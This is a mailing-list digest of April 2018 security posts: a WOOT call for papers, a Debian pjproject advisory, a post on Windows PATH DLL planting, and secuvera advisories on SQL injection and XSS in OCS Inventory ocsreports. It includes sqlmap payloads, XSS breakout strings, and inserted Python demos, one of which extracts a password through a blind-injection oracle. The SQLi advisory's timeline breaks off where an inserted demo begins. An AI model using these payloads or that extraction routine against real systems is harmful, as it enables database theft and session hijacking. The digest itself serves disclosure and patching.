Call for Papers: USENIX Workshop on Offensive Technologies (WOOT '18)

2018-04-10 Thread Yves Younan
Dear all,

We are pleased to announce the Call for Papers for the 12th USENIX
Workshop on Offensive Technologies! WOOT '18 will be held on August
13–14, 2018, in conjunction with USENIX Security in Baltimore, MD, USA.

WOOT provides a forum for high-quality, peer-reviewed work discussing
tools and techniques for attack. Submissions should reflect the state of
the art in offensive computer security technology, exposing poorly
understood mechanisms, presenting novel attacks, or surveying the state
of offensive operations at scale. WOOT '18 welcomes papers in both an
academic security context and more applied work that informs the field
about the state of security practice in offensive techniques.

Topics of interest include, but are not limited to:

Application security and vulnerability research
Attacks against privacy
Attacks on virtualization and the cloud
Browser and general client-side security
Hardware attacks
Internet of Things
Malware design, implementation, and analysis
Network and distributed systems attacks
Offensive applications of formal methods
Offensive aspects of mobile security
Offensive technologies using (or against) machine learning
Operating systems security
Practical attacks on deployed cryptographic systems

Paper submissions are due by Wednesday, May 30, 2018. Please read
through the complete Call for Papers for additional details and
instructions: https://www.usenix.org/conference/woot18/call-for-papers

We look forward to receiving your submissions!

Christian Rossow, CISPA
Yves Younan, Cisco Talos
WOOT '18 Program Co-Chairs



secuvera-SA-2017-04: SQL-Injection Vulnerability in OCS Inventory NG ocsreports Web application

2018-04-10 Thread Simon Bieber
Affected Products
   OCS Inventory NG ocsreports 2.4
   OCS Inventory NG ocsreports 2.3.1
   (older/other releases have not been tested)
References
   https://www.secuvera.de/advisories/secuvera-SA-2017-04.txt (used for updates)
   
https://www.ocsinventory-ng.org/en/ocs-inventory-server-2-4-1-has-been-released/
 (Release announcement of OCS Inventory 2.4.1)

Summary:
   Open Computer and Software Inventory Next Generation (OCS inventory NG) is free software that enables users to inventory IT assets. (Source: Wikipedia)
   OCS Reports for OCS Inventory is a web application to manage the OCS Inventory Server and Clients.
   The web application is prone to SQL injection (SQLi) attacks.

Effect:
   An authenticated attacker is able to gain full access to data stored within the database.

Vulnerable Scripts:
   1) index.php: Function "visu_search" ("Search with various criteria"), GET-parameter "value"
   2) ajax.php: Function "visu_groups", POST-parameter "columns%5B0%5D%5Bname%5D" ("columns[0][name]" in non-URL-encoded form for readability)

Examples:
   1) The following request of an authenticated read-only user was used in conjunction with sqlmap to exploit the issue:
   GET /index.php?function=visu_search=allsoft=somesoft HTTP/1.1
   Host: 
   Cookie: PHPSESSID=; VERS=7011; Connection: close
   
   SQLMap Output:
   sqlmap identified the following injection point(s) with a total of 232 HTTP(s) requests:
   ---
   Parameter: value (GET)
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: function=visu_search=allsoft=somesoft' AND 6455=6455 AND 'Ymqk'='Ymqk

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind
   Payload: function=visu_search=allsoft=somesoft' AND SLEEP(5) AND 'LhKg'='LhKg
   ---

   
   2)
   POST /ajax.php?function=visu_groups_header=true_footer=true HTTP/1.1
   Host: 
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   X-Requested-With: XMLHttpRequest
   Content-Length: 1434
   Cookie: PHPSESSID=; VERS=7011;
   Connection: close

   draw=4%5B0%5D%5Bdata%5D=NAME%5B0%5D%5Bname%5D=h.NAME%5B0%5D%5Bsearchable%5D=true&\
   columns%5B0%5D%5Borderable%5D=true%5B0%5D%5Bsearch%5D%5Bvalue%5D=%5B0%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B1%5D%5Bdata%5D=ID%5B1%5D%5Bname%5D=h.ID%5B1%5D%5Bsearchable%5D=true&\
   columns%5B1%5D%5Borderable%5D=true%5B1%5D%5Bsearch%5D%5Bvalue%5D=%5B1%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B2%5D%5Bdata%5D=DESCRIPTION%5B2%5D%5Bname%5D=h.DESCRIPTION%5B2%5D%5Bsearchable%5D=true&\
   columns%5B2%5D%5Borderable%5D=true%5B2%5D%5Bsearch%5D%5Bvalue%5D=%5B2%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B3%5D%5Bdata%5D=LASTDATE%5B3%5D%5Bname%5D=h.LASTDATE%5B3%5D%5Bsearchable%5D=true&\
   columns%5B3%5D%5Borderable%5D=true%5B3%5D%5Bsearch%5D%5Bvalue%5D=%5B3%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B4%5D%5Bdata%5D=NBRE%5B4%5D%5Bname%5D=NBRE%5B4%5D%5Bsearchable%5D=false%5B4%5D%5Borderable%5D=false&\
   columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=%5B4%5D%5Bsearch%5D%5Bregex%5D=false%5B0%5D%5Bcolumn%5D=0%5B0%5D%5Bdir%5D=asc&\
   start=0=10%5Bvalue%5D=PENTESTME%5Bregex%5D=false_85=8cfd903726e71489fd6afc44e9f3bfc002b598e0_COL==&\
   LANG=_CHECK==STAT_col%5B%5D=0_col%5B%5D=1_col%5B%5D=2_col%5B%5D=3_col%5B%5D=4%5B%5D=&\

   SQLMap Output:
   sqlmap identified the following injection point(s) with a total of 232 HTTP(s) requests:
   ---
   Parameter: columns%5B0%5D%5Bname%5D (POST)
   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind
   Payload:
   draw=4%5B0%5D%5Bdata%5D=NAME%5B0%5D%5Bname%5D=h.NAME' AND SLEEP(5) AND 'LhKg'='LhKg%5B0%5D%5Bsearchable%5D=true&\
   columns%5B0%5D%5Borderable%5D=true%5B0%5D%5Bsearch%5D%5Bvalue%5D=%5B0%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B1%5D%5Bdata%5D=ID%5B1%5D%5Bname%5D=h.ID%5B1%5D%5Bsearchable%5D=true&\
   columns%5B1%5D%5Borderable%5D=true%5B1%5D%5Bsearch%5D%5Bvalue%5D=%5B1%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B2%5D%5Bdata%5D=DESCRIPTION%5B2%5D%5Bname%5D=h.DESCRIPTION%5B2%5D%5Bsearchable%5D=true&\
   columns%5B2%5D%5Borderable%5D=true%5B2%5D%5Bsearch%5D%5Bvalue%5D=%5B2%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B3%5D%5Bdata%5D=LASTDATE%5B3%5D%5Bname%5D=h.LASTDATE%5B3%5D%5Bsearchable%5D=true&\
   columns%5B3%5D%5Borderable%5D=true%5B3%5D%5Bsearch%5D%5Bvalue%5D=%5B3%5D%5Bsearch%5D%5Bregex%5D=false&\
   columns%5B4%5D%5Bdata%5D=NBRE%5B4%5D%5Bname%5D=NBRE%5B4%5D%5Bsearchable%5D=false%5B4%5D%5Borderable%5D=false&\
   columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=%5B4%5D%5Bsearch%5D%5Bregex%5D=false%5B0%5D%5Bcolumn%5D=0%5B0%5D%5Bdir%5D=asc&\
   start=0=10%5Bvalue%5D=PENTESTME%5Bregex%5D=false_85=8cfd903726e71489fd6afc44e9f3bfc002b598e0_COL==&\
   LANG=_CHECK==STAT_col%5B%5D=0_col%5B%5D=1_col%5B%5D=2_col%5B%5D=3_col%5B%5D=4%5B%5D=&\
   ---
   
Solution:
   Install OCS Inventory Release 2.4.1 or newer. 

Disclosure Timeline:
   2017/12/15 
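The following is an added example and not part of the secuvera advisory or of the OCS Inventory code. It models the visu_search lookup in Python on an in-memory SQLite database (a stand-in for MySQL; the table and column names are invented), shows why the boolean-based payload from the sqlmap output above works, drives that same true/false oracle to read a value out of an unrelated table one character at a time, and puts the bound-parameter query that closes the hole next to it.

```python
import sqlite3


def make_db():
    """Constructed sample data. The schema is an assumption, not OCS Inventory's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE softwares (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE accounts (id INTEGER, user TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO softwares VALUES (?, ?)",
                     [(1, "somesoft"), (2, "othersoft")])
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret")])
    return conn


def visu_search_vulnerable(conn, value):
    """The 'value' GET parameter is pasted between single quotes, which is what
    the advisory's payload (somesoft' AND 6455=6455 AND 'Ymqk'='Ymqk) relies on."""
    sql = "SELECT id, name FROM softwares WHERE name = '%s'" % value
    return conn.execute(sql).fetchall()


def visu_search_fixed(conn, value):
    """Same lookup with a bound parameter: the quote in the payload is data, not SQL."""
    sql = "SELECT id, name FROM softwares WHERE name = ?"
    return conn.execute(sql, (value,)).fetchall()


def oracle(conn, condition):
    """Boolean-based blind oracle: the page lists 'somesoft' iff condition is true.
    The trailing 'Ymqk'='Ymqk swallows the application's own closing quote."""
    payload = "somesoft' AND (%s) AND 'Ymqk'='Ymqk" % condition
    return len(visu_search_vulnerable(conn, payload)) > 0


def blind_extract(conn, subquery, max_len=64):
    """Read the scalar result of subquery through the oracle, one character at a
    time, by binary search over printable ASCII (about 7 requests per character).
    unicode()/substr()/length() are SQLite names; on MySQL the equivalent
    functions are ORD()/SUBSTRING()/LENGTH()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, "length((%s)) >= %d" % (subquery, pos)):
            break  # no character at this position: end of string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(visu_search_vulnerable(db, "somesoft' AND 6455=6455 AND 'Ymqk'='Ymqk"))  # one row
    print(visu_search_vulnerable(db, "somesoft' AND 6455=6456 AND 'Ymqk'='Ymqk"))  # no row
    print(blind_extract(db, "SELECT passwd FROM accounts WHERE user = 'admin'"))
    print(visu_search_fixed(db, "somesoft' AND 6455=6455 AND 'Ymqk'='Ymqk"))       # no row, no injection
```

The two sqlmap payloads differ only in whether the injected condition holds, so the whole attack is a yes/no question asked a few hundred times; the fixed variant returns nothing for either payload because the quote never reaches the parser as syntax.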

[SECURITY] [DSA 4170-1] pjproject security update

2018-04-10 Thread Moritz Muehlenhoff

-------------------------------------------------------------------------
Debian Security Advisory DSA-4170-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
April 09, 2018   https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: pjproject
CVE ID : CVE-2017-16872 CVE-2017-16875 CVE-2018-198 CVE-2018-199

Multiple vulnerabilities have been discovered in the PJSIP/PJProject
multimedia communication which may result in denial of service during
the processing of SIP and SDP messages and ioqueue keys.

For the stable distribution (stretch), these problems have been fixed in
version 2.5.5~dfsg-6+deb9u1.

We recommend that you upgrade your pjproject packages.

For the detailed security status of pjproject please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/pjproject

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Defense in depth -- the Microsoft way (part 53): our MSRC doesn't know how Windows handles PATH

2018-04-10 Thread Stefan Kanthak
Hi @ll,

on their "Security Research & Defense" blog, members of Microsoft's
Security Response Center recently posted 


This blog post but clearly shows that the MSRC doesn't know how Windows
handles the PATH!

Error #1


| The directories that are in the PATH environment variable are always
| admin ACLed and a normal user can't modify contents of these directories.
...
| What Microsoft won't address (not a vulnerability)
| PATH directory scenarios - Since there can't be a non-admin directory in
| the PATH this can't be exploited.

OUCH!

The user can modify the PATH environment variable as s/he likes and add
arbitrary directories!

1) Start a command prompt, then run the following commands:

   MKDIR "%SystemDrive%\fubar"
   PATH %SystemDrive%\fubar;%PATH%
   START %ComSpec% /K PATH


2) The PATH environment variable is built during user logon from the
   system's PATH, stored in the registry entry
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
  "PATH"=expand:"%SystemRoot%\\System32;%SystemRoot%;%SystemRoot%\\System32\\WBEM;..."
   plus the user's PATH, stored in the registry entry
  [HKEY_CURRENT_USER\Environment]
  "PATH"=expand:";..."

   To add one or more arbitrary user-controlled directories to this
   persistent PATH, set the latter registry entry, for example via
   control panel.
   When a user does this, control panel broadcasts a WM_SETTINGCHANGE
   to all applications.
   Especially Windows' File Explorer (the "shell") rebuilds the PATH
   environment variable upon receiving this broadcast!


3) To add one or more arbitrary user-controlled directories to an
   application's PATH, create the registry entry
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\]
  "PATH"=";..."

   See 


Error #2


| 6. The directories that are listed in the PATH environment variable.
|Note that this does not include the per-application path specified
|by the App Paths registry key. The App Paths key is not used when
|computing the DLL search path.

OUCH!

The per-application path stored beneath the "App Paths" registry key is
prepended (NT 5.x and below) or appended (NT 6.x and above) to the PATH
environment variable when an application is started via one of the
ShellExecute*() functions.


Error #3


| DLL planting issues that fall into the category of PATH directories
| DLL planting are treated as won't fix.

OUCH!

The MSRC also ignores the fact that
CHDIR ""
START 
is equivalent to adding "" in front of the PATH!

JFTR: loading of DLLs from the CWD can be disabled via
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"CWDIllegalInDllSearch"=dword:
  (see )


stay tuned
Stefan Kanthak
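The following is an added example, not code from Stefan Kanthak's post or from Microsoft. It is the check a defender would run after reading the above: walk the search order the post argues about (the current working directory first, as in the CHDIR/START case, then each PATH entry in order) and report every directory the current user can create files in, since any such directory lets that user plant a DLL or EXE ahead of the real one. It reads only the live process PATH, not the registry values the post lists; the Windows paths in the sample run are constructed, and the writability predicate is injectable so the logic can be exercised on any OS.

```python
import os


def search_dirs(path_value, cwd=None, sep=os.pathsep):
    """Directories a DLL or EXE may be loaded from, in lookup order: the current
    working directory (if given) followed by each non-empty PATH entry.
    Duplicates are dropped; the first occurrence keeps its position."""
    candidates = ([cwd] if cwd else []) + [d for d in path_value.split(sep) if d]
    seen, ordered = set(), []
    for d in candidates:
        key = os.path.normcase(os.path.normpath(d))
        if key not in seen:
            seen.add(key)
            ordered.append(d)
    return ordered


def writable_search_dirs(path_value, cwd=None, sep=os.pathsep, is_writable=None):
    """Entries of the search order the current user can write to.
    is_writable defaults to a real filesystem probe; tests pass a constructed one."""
    if is_writable is None:
        def is_writable(d):
            return os.path.isdir(d) and os.access(d, os.W_OK)
    return [d for d in search_dirs(path_value, cwd, sep) if is_writable(d)]


if __name__ == "__main__":
    # Live check of this user's own environment.
    hits = writable_search_dirs(os.environ.get("PATH", ""), cwd=os.getcwd())
    for d in hits:
        print("user-writable search directory:", d)
    if not hits:
        print("no user-writable directory in CWD or PATH")
```

On a Windows box where the post's MKDIR/PATH commands were run, %SystemDrive%\fubar shows up first in the hit list; the CWD entry is reported even when it is not in PATH at all, which is the point of the post's third error.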


secuvera-SA-2017-03: Reflected Cross-Site-Scripting Vulnerabilities in OCS Inventory NG ocsreports Web application

2018-04-10 Thread Simon Bieber
Affected Products
   OCSInventory-ocsreports 2.4
   (older releases have not been tested) 
References
   https://www.secuvera.de/advisories/secuvera-SA-2017-03.txt (used for updates)
   
https://www.ocsinventory-ng.org/en/ocs-inventory-server-2-4-1-has-been-released/
 (Release announcement of OCS Inventory 2.4.1)

Summary:
   Open Computer and Software Inventory Next Generation (OCS inventory NG) is free software that enables users to inventory IT assets. (Source: Wikipedia)
   OCS Reports for OCS Inventory is a web application to manage the OCS Inventory Server and Clients.
   The web application is prone to reflected Cross-Site-Scripting (XSS) attacks.

Effect:
   An attacker is able to execute arbitrary (JavaScript) code within a victim's browser by luring the victim into clicking a link containing malicious code.

Vulnerable Scripts:
   1) anonymous: USERID and Password field of login page are vulnerable
   2) logged in user: index.php: arbitrary supplied URL parameters will get included within a javascript block.
   3) logged in user: index.php: parameter "prov" will get included within a hidden page form field
   
Examples:
   1) Enter the following payload into login form: " onload="alert(42);
   2) http:///index.php?function=visu_search=allsoft=somesoftware%'-alert(1)-'js9gz=1
   3) http:///index.php?function=visu_search=allsoftfrsk4'accesskey%3d'x'onclick%3d'alert(1)'%2f%2fqqy1d=

Solution:
   Install OCS Inventory Release 2.4.1 or newer. 
   
Disclosure Timeline:
   2017/12/15 vendor contacted, asked for security contact information
   2018/01/02 contacted vendor again after no answer was received so far
   2018/01/02 response of responsible contact 
   2018/01/22 Sent technical details
   2018/02/12 Developer replied proposing fix
   2018/03/28 Developer contacted us to announce the upcoming release
   2018/04/05 OCS Version 2.4.1 was released
   2018/08/09 Release of the security advisory
   
Credits
   Simon Bieber, secuvera GmbH
   sbie...@secuvera.de
   https://www.secuvera.de

Thanks to:
   Michael Hermann, secuvera GmbH 
   for his support!
   Gilles Dubois and Damien Belliard, factorfx
   for fixing this issue!

Disclaimer:
   All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information.
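The following is an added example, not part of the secuvera advisory or of the ocsreports code. It takes the three payloads above (payloads 2 and 3 URL-decoded from the example links) and renders each into the kind of context the advisory names for it: a double-quoted HTML attribute, a JavaScript string literal, and a single-quoted hidden form field. The page templates are assumptions, not ocsreports' markup. For each context the vulnerable rendering sits beside one that encodes for that context, and two small checks approximate what a browser would do: Python's html.parser lists the attributes a tag ends up with, and a scanner for JS string literals tells whether the payload closed the literal early.

```python
import html
import json
from html.parser import HTMLParser

# The advisory's payloads, URL-decoded.
LOGIN_PAYLOAD = '" onload="alert(42);'
JS_PAYLOAD = "somesoftware%'-alert(1)-'js9gz"
PROV_PAYLOAD = "frsk4'accesskey='x'onclick='alert(1)'//qqy1d"


# Context 1: double-quoted HTML attribute (login form USERID field).
def render_login_vulnerable(userid):
    return '<input type="text" name="USERID" value="%s">' % userid


def render_login_fixed(userid):
    # html.escape with quote=True turns & < > " and ' into entities.
    return '<input type="text" name="USERID" value="%s">' % html.escape(userid, quote=True)


# Context 3: single-quoted hidden field (parameter "prov").
def render_hidden_vulnerable(prov):
    return "<input type='hidden' name='prov' value='%s'>" % prov


def render_hidden_fixed(prov):
    return "<input type='hidden' name='prov' value='%s'>" % html.escape(prov, quote=True)


# Context 2: value reflected into a JavaScript string inside a <script> block.
def render_js_vulnerable(value):
    return "var value = '%s';" % value


def render_js_fixed(value):
    # JSON-encode for the JS string context, then also neutralise the characters
    # that matter to the HTML parser so the literal cannot contain </script>.
    literal = json.dumps(value)
    literal = literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return "var value = %s;" % literal


class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def attribute_names(fragment):
    """Names of every attribute the parser sees in fragment; an injected
    onload/onclick shows up here as an extra name."""
    parser = _AttrCollector()
    parser.feed(fragment)
    return [name for name, _ in parser.attrs]


def js_literal_closed_early(fragment):
    """For a 'var value = <literal>;' statement, True if the quoted literal is
    terminated before its last character (i.e. the payload broke out of it)."""
    lit = fragment[len("var value = "):-1]
    quote = lit[0]
    i = 1
    while i < len(lit):
        if lit[i] == "\\":
            i += 2  # skip the escaped character
            continue
        if lit[i] == quote:
            return i != len(lit) - 1
        i += 1
    return True  # never closed at all


if __name__ == "__main__":
    print(attribute_names(render_login_vulnerable(LOGIN_PAYLOAD)))
    print(attribute_names(render_login_fixed(LOGIN_PAYLOAD)))
    print(attribute_names(render_hidden_vulnerable(PROV_PAYLOAD)))
    print(attribute_names(render_hidden_fixed(PROV_PAYLOAD)))
    print(js_literal_closed_early(render_js_vulnerable(JS_PAYLOAD)))
    print(js_literal_closed_early(render_js_fixed(JS_PAYLOAD)))
```

Note that the same html.escape call fixes both attribute contexts only because it escapes the single quote as well as the double quote; an encoder that leaves ' alone would stop payload 1 and still let payload 3 through, which is why the encoding has to match the quoting of the surrounding template rather than be applied generically.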